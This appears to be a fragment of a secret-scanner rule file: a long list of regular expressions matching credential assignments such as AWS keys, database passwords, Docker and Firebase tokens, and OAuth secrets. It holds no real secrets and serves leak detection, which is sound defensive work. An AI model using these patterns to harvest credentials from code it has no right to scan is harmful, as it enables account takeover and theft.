"(?i)[\"']?flickr[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?flask[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firefox[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?project[_-]?develop[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?api[_-]?json[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?file[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?exp[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?eureka[_-]?awssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?sonatype[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?heroku[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?github[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?end[_-]?user[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?encryption[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?elasticsearch[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?elastic[_-]?cloud[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dsonar[_-]?projectkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dsonar[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?droplet[_-]?travis[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dropbox[_-]?oauth[_-]?bearer[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?doordash[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dockerhubpassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dockerhub[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?postgres[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?passwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?hub[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?ids[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?body[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?digitalocean[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dgpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?secure[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ddgc[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ddg[_-]?test[_-]?email[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ddg[_-]?test[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?connection[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?datadog[_-]?app[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?datadog[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?port[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?danger[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cypress[_-]?record[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coverity[_-]?scan[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coveralls[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coveralls[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coveralls[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cos[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?conversation[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?conversation[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?v2[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?test[_-]?org[_-]?cma[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?php[_-]?management[_-]?test[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?integration[_-]?management[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?cma[_-]?test[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?consumerkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?consumer[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?conekta[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coding[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?codecov[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?codeclimate[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?codacy[_-]?project[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cocoapods[_-]?trunk[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cocoapods[_-]?trunk[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?clu[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?clu[_-]?repo[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudinary[_-]?url[_-]?staging[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudinary[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?auth[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?auth[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?service[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?processed[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?parsed[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?order[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?instance[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?audited[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?archived[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloud[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?clojars[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cli[_-]?e2e[_-]?cma[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?claimr[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?claimr[_-]?superuser[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?claimr[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?claimr[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?user[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?server[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?registry[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?project[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?chrome[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?chrome[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cheverny[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cf[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?certificate[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?censys[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cattle[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cattle[_-]?agent[_-]?instance[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cattle[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cargo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cache[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bx[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bx[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bundlesize[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?built[_-]?branch[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?browserstack[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?browser[_-]?stack[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?brackets[_-]?repo[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?pass[_-]?prod[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintraykey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?gpg[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?b2[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?b2[_-]?app[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awscn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awscn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awsaccesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?ses[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?ses[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?config[_-]?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?config[_-]?accesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?access[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?author[_-]?npm[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?author[_-]?email[_-]?addr[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?auth0[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?auth0[_-]?api[_-]?clientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?assistant[_-]?iam[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifactory[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?argos[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?apple[_-]?id[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?appclientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?secrete[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?report[_-]?token[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?bucket[_-]?perm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?apigw[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?apiary[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?key[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aos[_-]?sec[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aos[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ansible[_-]?vault[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?android[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?anaconda[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?amazon[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?amazon[_-]?bucket[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - 